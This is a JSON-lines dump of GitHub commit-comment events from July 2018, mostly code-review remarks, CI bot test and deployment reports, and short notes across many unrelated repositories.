{"id":"7966282880","type":"CommitCommentEvent","actor":{"login":"zhuwu2012"},"repo":{"name":"Gladysgong/cninfo"},"payload":{"comment":{"id":29710385,"position":null,"line":null,"path":null,"commit_id":"499a1aa9510cf2b412bb92fab3eaba3c2a0d29d2","created_at":"2018-07-14T19:58:19Z","updated_at":"2018-07-14T19:58:19Z","author_association":"NONE","body":"very good source code"}},"created_at":"2018-07-14T19:58:19Z"}
{"id":"7965027000","type":"CommitCommentEvent","actor":{"login":"j0e1in"},"repo":{"name":"j0e1in/MasterClassDownloader"},"payload":{"comment":{"id":29707312,"position":null,"line":null,"path":null,"commit_id":"bf55725d27a85b239798ccdd0d21013731451b21","created_at":"2018-07-14T02:00:48Z","updated_at":"2018-07-14T02:00:48Z","author_association":"OWNER","body":"Sorry, fixed."}},"created_at":"2018-07-14T02:00:48Z"}
{"id":"7965032240","type":"CommitCommentEvent","actor":{"login":"seabornlee"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707323,"position":null,"line":null,"path":null,"commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T02:04:51Z","updated_at":"2018-07-14T02:04:51Z","author_association":"NONE","body":"请参考 https://github.com/seabornlee/clean-code/tree/answer，用 JUnit 覆盖核心逻辑。"}},"created_at":"2018-07-14T02:04:51Z"}
{"id":"7965033402","type":"CommitCommentEvent","actor":{"login":"seabornlee"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707325,"position":34,"line":34,"path":"pom.xml","commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T02:05:45Z","updated_at":"2018-07-14T02:05:45Z","author_association":"NONE","body":"对齐"}},"created_at":"2018-07-14T02:05:45Z"}
{"id":"7965033612","type":"CommitCommentEvent","actor":{"login":"seabornlee"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707326,"position":14,"line":14,"path":"src/main/java/com/tzg/mars/Main.java","commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T02:05:56Z","updated_at":"2018-07-14T02:05:56Z","author_association":"NONE","body":"多余的空行"}},"created_at":"2018-07-14T02:05:56Z"}
{"id":"7965033740","type":"CommitCommentEvent","actor":{"login":"hung38585"},"repo":{"name":"hung38585/go"},"payload":{"comment":{"id":29707327,"position":3,"line":1,"path":"index.txt","commit_id":"af2370f13fadd0ccf59e4b3bfc7b2dc3ec7cddc1","created_at":"2018-07-14T02:06:02Z","updated_at":"2018-07-14T02:06:02Z","author_association":"OWNER","body":"pisjf"}},"created_at":"2018-07-14T02:06:02Z"}
{"id":"7965033830","type":"CommitCommentEvent","actor":{"login":"duclinh"},"repo":{"name":"duclinh/LearningGit"},"payload":{"comment":{"id":29707328,"position":7,"line":7,"path":"Task2.html","commit_id":"9670b9924f75e96c5766f8f61fbce3034009e189","created_at":"2018-07-14T02:06:06Z","updated_at":"2018-07-14T02:06:06Z","author_association":"OWNER","body":"e, cho nay viet dung khong may ???!!! Xem lai"}},"created_at":"2018-07-14T02:06:06Z"}
{"id":"7965034332","type":"CommitCommentEvent","actor":{"login":"dbaldan"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29707329,"position":null,"line":null,"path":null,"commit_id":"902ca32b8c4d9c5d9338afca441719e3fdf0f41c","created_at":"2018-07-14T02:06:28Z","updated_at":"2018-07-14T02:06:28Z","author_association":"NONE","body":"@whitedragon0000 I see. I was just wanting to know what happens when you kill a boss, which flag is turned on? Can I turn it on manually with script?\r\n\r\nAbout the duck animations, thanks! Althought @DCurrent  had suggested to use different names:\r\nDUCK\r\nDUCK_START\r\nDUCK_END\r\n\r\nBut I think this could confuse some modders, because no animation has underline on its name.\r\n\r\nThere is a typo there: it should be LOSE not LOOSE. Plus, what EDGE means?"}},"created_at":"2018-07-14T02:06:28Z"}
{"id":"7965034608","type":"CommitCommentEvent","actor":{"login":"seabornlee"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707330,"position":56,"line":56,"path":"src/main/java/com/tzg/mars/MarsMission.java","commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T02:06:43Z","updated_at":"2018-07-14T02:06:43Z","author_association":"NONE","body":"格式化代码，注意空格"}},"created_at":"2018-07-14T02:06:43Z"}
{"id":"7965034720","type":"CommitCommentEvent","actor":{"login":"Tafoid"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29707331,"position":null,"line":null,"path":null,"commit_id":"194562b0aa8e31795884a66a8ae3b8d2f6b61a3f","created_at":"2018-07-14T02:06:49Z","updated_at":"2018-07-14T02:06:49Z","author_association":"CONTRIBUTOR","body":"finallap and clones - namcos2.cpp\r\nFails to boot - Region for nvram is FF filled with no discernible data.\r\n\r\n![finallap-diff](https://user-images.githubusercontent.com/9075896/42719730-bd53b26a-86e8-11e8-854a-53bc7c7bb6e7.png)\r\n\r\n"}},"created_at":"2018-07-14T02:06:49Z"}
{"id":"7965035931","type":"CommitCommentEvent","actor":{"login":"seabornlee"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707332,"position":62,"line":62,"path":"src/main/java/com/tzg/mars/MarsMission.java","commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T02:07:48Z","updated_at":"2018-07-14T02:07:48Z","author_association":"NONE","body":"可封装方法以更好地表现意图，封装细节"}},"created_at":"2018-07-14T02:07:48Z"}
{"id":"7965036319","type":"CommitCommentEvent","actor":{"login":"seabornlee"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707335,"position":89,"line":89,"path":"src/main/java/com/tzg/mars/MarsMission.java","commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T02:08:06Z","updated_at":"2018-07-14T02:08:06Z","author_association":"NONE","body":"可以 inline 这个变量"}},"created_at":"2018-07-14T02:08:06Z"}
{"id":"7965036676","type":"CommitCommentEvent","actor":{"login":"zgq354"},"repo":{"name":"zgq354/weibo-rss"},"payload":{"comment":{"id":29707336,"position":null,"line":null,"path":null,"commit_id":"bb562e9637b847d612433dc653383610325e867b","created_at":"2018-07-14T02:08:21Z","updated_at":"2018-07-14T02:08:21Z","author_association":"OWNER","body":"主要是这样会影响到一些阅读器的封面图，直接显示大表情比较难看"}},"created_at":"2018-07-14T02:08:21Z"}
{"id":"7965037168","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29707337,"position":null,"line":null,"path":null,"commit_id":"bc81d6bcc5c1f112c4d8a00fe86d51ffe9516e0d","created_at":"2018-07-14T02:08:40Z","updated_at":"2018-07-14T02:08:40Z","author_association":"NONE","body":"### Results for event id: f7c2fbd8-7d57-47fc-b173-5482fbde4eb1\n<details><summary>DockerServerless : Deploy to Lambda (d7f9ab) Execution completed.</summary>\n<p>\n\n**output tail (42613 lines total):**\n\n```\n...\nregion: ap-southeast-2\nstack: sample-http-dev\napi keys:\n  None\nendpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev/sample-http\nfunctions:\n  sample-http: sample-http-dev-sample-http\n\nStack Outputs\nSampleDashhttpLambdaFunctionArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-http-dev-sample-http\nApiGatewayRestApiRootResource: q643s5bj1a\nApiGatewayRestApi: yeajzvl29j\nServiceEndpoint: https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: io.zoto.serverless.dev\nServerlessAliasReference: REFERENCE\n\nDone in 70.14s.\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: f7c2fbd8-7d57-47fc-b173-5482fbde4eb1-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/f7c2fbd8-7d57-47fc-b173-5482fbde4eb1-output.tar.gz\n{\n    \"ETag\": \"\\\"61ac11bd44953e0cea78a3f68ad22a0a\\\"\"\n}\nExecution time was 318 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-14T02:08:40Z"}
{"id":"7965038730","type":"CommitCommentEvent","actor":{"login":"seabornlee"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707339,"position":7,"line":7,"path":"src/main/java/com/tzg/mars/rovers/Rover.java","commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T02:09:58Z","updated_at":"2018-07-14T02:09:58Z","author_association":"NONE","body":"Rover 是名词，不是一个好接口"}},"created_at":"2018-07-14T02:09:58Z"}
{"id":"7965042994","type":"CommitCommentEvent","actor":{"login":"muyyy"},"repo":{"name":"muyyy/LeetCode_my"},"payload":{"comment":{"id":29707347,"position":3,"line":3,"path":"leetcode/src/leetcode/New.java","commit_id":"a5fe5e0c2c4995beb2fde04623355dd25def9b7f","created_at":"2018-07-14T02:13:20Z","updated_at":"2018-07-14T02:13:20Z","author_association":"OWNER","body":"第一额"}},"created_at":"2018-07-14T02:13:20Z"}
{"id":"7965044759","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29707349,"position":1,"line":null,"path":"1531534481.61/github_test.txt","commit_id":"9b9e722e8c4471f35c7713d4036ebe26380b41ed","created_at":"2018-07-14T02:14:44Z","updated_at":"2018-07-14T02:14:44Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-14T02:14:44Z"}
{"id":"7965045758","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"janekptacijarabaci/UXP"},"payload":{"comment":{"id":29707354,"position":null,"line":null,"path":null,"commit_id":"6216259f020f6a8df53f7628ce4e1b8218cad470","created_at":"2018-07-14T02:15:32Z","updated_at":"2018-07-14T02:15:32Z","author_association":"OWNER","body":"\\# 630\r\n\r\nTag # 457 \r\n\r\n```\r\nWARNING: NS_ENSURE_SUCCESS(rv, rv) failed with result 0x80520012:\r\nfile [path]/UXP/netwerk/base/nsIOService.cpp, line 792\r\n```\r\nBased on:\r\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1333174\r\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1351443\r\n\r\n```\r\nWARNING: NS_ENSURE_SUCCESS(rv, rv) failed with result 0x80520012:\r\nfile [path]/UXP/netwerk/base/nsNetUtilInlines.h, line 180\r\n```\r\nBased on:\r\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1333172\r\n"}},"created_at":"2018-07-14T02:15:32Z"}
{"id":"7965046349","type":"CommitCommentEvent","actor":{"login":"jilinzhou"},"repo":{"name":"ApolloAuto/apollo"},"payload":{"comment":{"id":29707355,"position":5,"line":273,"path":"modules/control/controller/lat_controller.cc","commit_id":"3896ef2f7523526e3128305fcbe51ba63aa5b784","created_at":"2018-07-14T02:16:03Z","updated_at":"2018-07-14T02:16:03Z","author_association":"CONTRIBUTOR","body":"1. There is no need to set this speed again here. It was set in VehicleStateProvider's callback along with other chassis data. If you do a comparison before calling the setter in between VehicleStateProvider::instance()->linear_velocity() and chassis->speed_mps(), they are always the same.\r\n2. After ported Apollo 2.0 over QNX, We had been experiencing the steering control stability issue for our MKZ. To figure it out, I went through the technical report in which the dynamic model (adopted here) was derived (Automatic Steering Methods for Autonomous Automobile Path Tracking by Jarrod M. Snider). One possible cause (not 100% sure) I found is the speed used here. The chassis->mps give the speed of the center of front axle along the wheel's orientation. However, the reference frame of the dynamic model is based on the center of gravity of the car in which it expects the car's longitudinal velocity (v_x) for the lateral error rate (Section 4.1.1 Linearized Dynamic Bicycle Model, Equation (28)). The instability behaviour is quite obvious on a curvy road. After I switch it to the longitudinal velocity, the instability behaviour disappears right away but the car still slowly swings along the reference line. So I further tuned the control parameter q_4 to add some damping to the controller which ends with a acceptable result."}},"created_at":"2018-07-14T02:16:03Z"}
{"id":"7965047534","type":"CommitCommentEvent","actor":{"login":"jilinzhou"},"repo":{"name":"ApolloAuto/apollo"},"payload":{"comment":{"id":29707358,"position":null,"line":null,"path":null,"commit_id":"3896ef2f7523526e3128305fcbe51ba63aa5b784","created_at":"2018-07-14T02:17:03Z","updated_at":"2018-07-14T02:17:03Z","author_association":"CONTRIBUTOR","body":"Please see inlined comments."}},"created_at":"2018-07-14T02:17:03Z"}
{"id":"7965048331","type":"CommitCommentEvent","actor":{"login":"shaform"},"repo":{"name":"xianmin/hugo-theme-jane"},"payload":{"comment":{"id":29707360,"position":null,"line":null,"path":null,"commit_id":"b8c640535806cb23a75fc163f26278d351b4ba8e","created_at":"2018-07-14T02:17:41Z","updated_at":"2018-07-14T02:17:41Z","author_association":"CONTRIBUTOR","body":"Just curious, what would be affected by this change?\r\nWhat was broken before?\r\nI am still using the leading slash on my blog so I wonder whether I should change as well.\r\n"}},"created_at":"2018-07-14T02:17:41Z"}
{"id":"7965048789","type":"CommitCommentEvent","actor":{"login":"dbaldan"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29707363,"position":null,"line":null,"path":null,"commit_id":"c8c3f5e1e30ae3c577eb1b352420dee2b7f48be3","created_at":"2018-07-14T02:18:03Z","updated_at":"2018-07-14T02:18:03Z","author_association":"NONE","body":"@whitedragon0000 there is a typo here.\r\nLOOSE - not firmly or tightly fixed in place; detached or able to be detached.\r\nLOSE - be deprived of or cease to have or retain (something). To be defeated.\r\n\r\nI think LOSE makes more sense."}},"created_at":"2018-07-14T02:18:03Z"}
{"id":"7965049383","type":"CommitCommentEvent","actor":{"login":"r-plus"},"repo":{"name":"GaryniL/ondeviceconsole"},"payload":{"comment":{"id":29707365,"position":null,"line":null,"path":null,"commit_id":"a93212ac30528d63a1d01a8b84609ff756a63f3d","created_at":"2018-07-14T02:18:32Z","updated_at":"2018-07-14T02:18:32Z","author_association":"NONE","body":"kirb version of ondeviceonsole is working on iOS 11 kpp-less environment.\r\nhttps://github.com/kirb/ondeviceconsole/commit/6b6d132d448fc7407689cdffac08051bdea0a162"}},"created_at":"2018-07-14T02:18:32Z"}
{"id":"7965052652","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707366,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-14T02:21:29Z","updated_at":"2018-07-14T02:21:29Z","author_association":"NONE","body":"kiva-non-quad-walls (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1686 of 1686 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-14T02:21:29Z"}
{"id":"7965061008","type":"CommitCommentEvent","actor":{"login":"GnSweepWell"},"repo":{"name":"GnSweepWell/hello-world-where-you-at-"},"payload":{"comment":{"id":29707389,"position":null,"line":null,"path":null,"commit_id":"ea007b3de8bf3982e23b2bdd0ada77326ed9cb0d","created_at":"2018-07-14T02:28:43Z","updated_at":"2018-07-14T02:28:43Z","author_association":"OWNER","body":"comment\r\n"}},"created_at":"2018-07-14T02:28:43Z"}
{"id":"7965062780","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29707395,"position":null,"line":null,"path":null,"commit_id":"1f20ff54630309245890b958e826a11432002c5a","created_at":"2018-07-14T02:30:15Z","updated_at":"2018-07-14T02:30:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [022 - Criar EndereçoResource](https://trello.com/c/TMbxk55M/29-022-criar-endere%C3%A7oresource)"}},"created_at":"2018-07-14T02:30:15Z"}
{"id":"7965063765","type":"CommitCommentEvent","actor":{"login":"jscsd226"},"repo":{"name":"jscsd226/q"},"payload":{"comment":{"id":29707398,"position":null,"line":null,"path":null,"commit_id":"02dc3d62f095ad213a8061ef2f8e32568e54040c","created_at":"2018-07-14T02:31:06Z","updated_at":"2018-07-14T02:31:06Z","author_association":"OWNER","body":"n"}},"created_at":"2018-07-14T02:31:06Z"}
{"id":"7965064088","type":"CommitCommentEvent","actor":{"login":"isoki87"},"repo":{"name":"isoki87/Coding_Problems"},"payload":{"comment":{"id":29707400,"position":null,"line":null,"path":null,"commit_id":"2702893ed2904d3d17c25363cab2a6dadcd4d8cc","created_at":"2018-07-14T02:31:25Z","updated_at":"2018-07-14T02:31:25Z","author_association":"OWNER","body":"Added connections to airport to class"}},"created_at":"2018-07-14T02:31:25Z"}
{"id":"7965065302","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707403,"position":null,"line":null,"path":null,"commit_id":"4015829486bce3a4cc33c08675d7c6bce9b5d51b","created_at":"2018-07-14T02:32:34Z","updated_at":"2018-07-14T02:32:34Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - Win64-Windows-7-VisualStudio-14: Tests Failed (2407 of 2935 tests passed, 95 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 528 tests had: Table big diffs.\n * 12 tests had: AUD diffs.\n * 1 test had: ESO small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 95\n * Failed: 528\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-82.01%25-red.png)</a> \n"}},"created_at":"2018-07-14T02:32:34Z"}
{"id":"7965066873","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707405,"position":null,"line":null,"path":null,"commit_id":"1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd","created_at":"2018-07-14T02:34:04Z","updated_at":"2018-07-14T02:34:04Z","author_association":"NONE","body":"issue_6736 (mbadams5) - i386-Windows-7-VisualStudio-14: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T02:34:04Z"}
{"id":"7965067765","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707406,"position":9,"line":9,"path":"pandas/0017_tama/0107_fanfan.txt","commit_id":"a9024438945ad99b2d8d4cdd9c7c4f394cd1772e","created_at":"2018-07-14T02:34:44Z","updated_at":"2018-07-14T02:34:44Z","author_association":"CONTRIBUTOR","body":"F\r\nFanfan is a female red panda."}},"created_at":"2018-07-14T02:34:44Z"}
{"id":"7965068307","type":"CommitCommentEvent","actor":{"login":"wenjiansong"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707407,"position":34,"line":34,"path":"pom.xml","commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T02:35:11Z","updated_at":"2018-07-14T02:35:11Z","author_association":"OWNER","body":"谢谢，已重新格式化"}},"created_at":"2018-07-14T02:35:11Z"}
{"id":"7965068317","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707408,"position":null,"line":null,"path":null,"commit_id":"1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd","created_at":"2018-07-14T02:35:12Z","updated_at":"2018-07-14T02:35:12Z","author_association":"NONE","body":"issue_6736 (mbadams5) - Win64-Windows-7-VisualStudio-14: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T02:35:12Z"}
{"id":"7965068423","type":"CommitCommentEvent","actor":{"login":"wenjiansong"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707409,"position":14,"line":14,"path":"src/main/java/com/tzg/mars/Main.java","commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T02:35:16Z","updated_at":"2018-07-14T02:35:16Z","author_association":"OWNER","body":"谢谢，已重新格式化"}},"created_at":"2018-07-14T02:35:16Z"}
{"id":"7965068543","type":"CommitCommentEvent","actor":{"login":"wenjiansong"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707410,"position":56,"line":56,"path":"src/main/java/com/tzg/mars/MarsMission.java","commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T02:35:22Z","updated_at":"2018-07-14T02:35:22Z","author_association":"OWNER","body":"谢谢，已重新格式化"}},"created_at":"2018-07-14T02:35:22Z"}
{"id":"7965068629","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707411,"position":3,"line":3,"path":"pandas/0017_tama/0107_fanfan.txt","commit_id":"a9024438945ad99b2d8d4cdd9c7c4f394cd1772e","created_at":"2018-07-14T02:35:28Z","updated_at":"2018-07-14T02:35:28Z","author_association":"CONTRIBUTOR","body":"1999/7/9"}},"created_at":"2018-07-14T02:35:28Z"}
{"id":"7965068842","type":"CommitCommentEvent","actor":{"login":"wenjiansong"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707413,"position":62,"line":62,"path":"src/main/java/com/tzg/mars/MarsMission.java","commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T02:35:40Z","updated_at":"2018-07-14T02:35:40Z","author_association":"OWNER","body":"谢谢，已重构重新提交"}},"created_at":"2018-07-14T02:35:40Z"}
{"id":"7965069119","type":"CommitCommentEvent","actor":{"login":"wenjiansong"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707415,"position":89,"line":89,"path":"src/main/java/com/tzg/mars/MarsMission.java","commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T02:35:53Z","updated_at":"2018-07-14T02:35:53Z","author_association":"OWNER","body":"谢谢，已重构重新提交"}},"created_at":"2018-07-14T02:35:53Z"}
{"id":"7965070416","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707419,"position":4,"line":4,"path":"pandas/0017_tama/0107_fanfan.txt","commit_id":"a9024438945ad99b2d8d4cdd9c7c4f394cd1772e","created_at":"2018-07-14T02:37:02Z","updated_at":"2018-07-14T02:37:02Z","author_association":"CONTRIBUTOR","body":"Ikeda Zoo"}},"created_at":"2018-07-14T02:37:02Z"}
{"id":"7965071049","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29707426,"position":null,"line":null,"path":null,"commit_id":"f27c5e901dda9e715d09b0ce34301ef8a4ec65d1","created_at":"2018-07-14T02:37:40Z","updated_at":"2018-07-14T02:37:40Z","author_association":"NONE","body":"### Results for event id: 2cf71c04-320a-4f11-b258-c2afc7bcf18b\n<details><summary>DockerServerless : Deploy to Lambda (d7f9ab) Execution completed.</summary>\n<p>\n\n**output tail (281 lines total):**\n\n```\n...\nstage: dev\nregion: ap-southeast-2\nstack: sample-http-dev\napi keys:\n  None\nendpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev/sample-http\nfunctions:\n  sample-http: sample-http-dev-sample-http\n\nStack Outputs\nSampleDashhttpLambdaFunctionArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-http-dev-sample-http\nApiGatewayRestApiRootResource: q643s5bj1a\nApiGatewayRestApi: yeajzvl29j\nServiceEndpoint: https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: io.zoto.serverless.dev\nServerlessAliasReference: REFERENCE\n\nDone in 90.28s.\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 2cf71c04-320a-4f11-b258-c2afc7bcf18b-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/2cf71c04-320a-4f11-b258-c2afc7bcf18b-output.tar.gz\n{\n    \"ETag\": \"\\\"7685d5003073087575e6385ce9d4013f\\\"\"\n}\nExecution time was 113 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-14T02:37:40Z"}
{"id":"7965072356","type":"CommitCommentEvent","actor":{"login":"YoshihideSogawa"},"repo":{"name":"YoshihideSogawa/fitnotifications"},"payload":{"comment":{"id":29707428,"position":5,"line":21,"path":"app/src/main/res/values-ja/strings.xml","commit_id":"4c5300346cb2bd016bdbeb5ea7e6f30cf96a316c","created_at":"2018-07-14T02:38:54Z","updated_at":"2018-07-14T02:38:54Z","author_association":"OWNER","body":"Change\r\n有効化したアプリ\r\n"}},"created_at":"2018-07-14T02:38:54Z"}
{"id":"7965073636","type":"CommitCommentEvent","actor":{"login":"wenjiansong"},"repo":{"name":"wenjiansong/mars-rover"},"payload":{"comment":{"id":29707431,"position":7,"line":7,"path":"src/main/java/com/tzg/mars/rovers/Rover.java","commit_id":"f8ecf7d7181710e400a8919617bfef69cc8797d9","created_at":"2018-07-14T02:40:02Z","updated_at":"2018-07-14T02:40:02Z","author_association":"OWNER","body":"谢谢，您觉得用哪个词会更好一些？"}},"created_at":"2018-07-14T02:40:02Z"}
{"id":"7965073929","type":"CommitCommentEvent","actor":{"login":"ian-luttrell"},"repo":{"name":"ian-luttrell/lamp-site"},"payload":{"comment":{"id":29707432,"position":null,"line":null,"path":null,"commit_id":"d6f062ff72d7c86bde6fbe5cb368db508c4a4656","created_at":"2018-07-14T02:40:16Z","updated_at":"2018-07-14T02:40:16Z","author_association":"OWNER","body":"These changes were inspired by the answer from the user \"Your Common Sense\" to my Stack Exchange Code Review question:\r\nhttps://codereview.stackexchange.com/questions/198241/password-hashing-and-sql-queries"}},"created_at":"2018-07-14T02:40:16Z"}
{"id":"7965076734","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29707436,"position":null,"line":null,"path":null,"commit_id":"60c401522902de0966195dadef60102422b1f5ee","created_at":"2018-07-14T02:42:42Z","updated_at":"2018-07-14T02:42:42Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/2004/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 21838 seconds\n\nTests produced 2926 warnings. 2926 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-14T02:42:42Z"}
{"id":"7965077143","type":"CommitCommentEvent","actor":{"login":"hrg921"},"repo":{"name":"hrg921/quant-research-platform"},"payload":{"comment":{"id":29707437,"position":2,"line":2,"path":".gitignore","commit_id":"f81367283144e6ef978404b2331a4ccd2f66a6bb","created_at":"2018-07-14T02:43:05Z","updated_at":"2018-07-14T02:43:05Z","author_association":"OWNER","body":"created by gitignore"}},"created_at":"2018-07-14T02:43:05Z"}
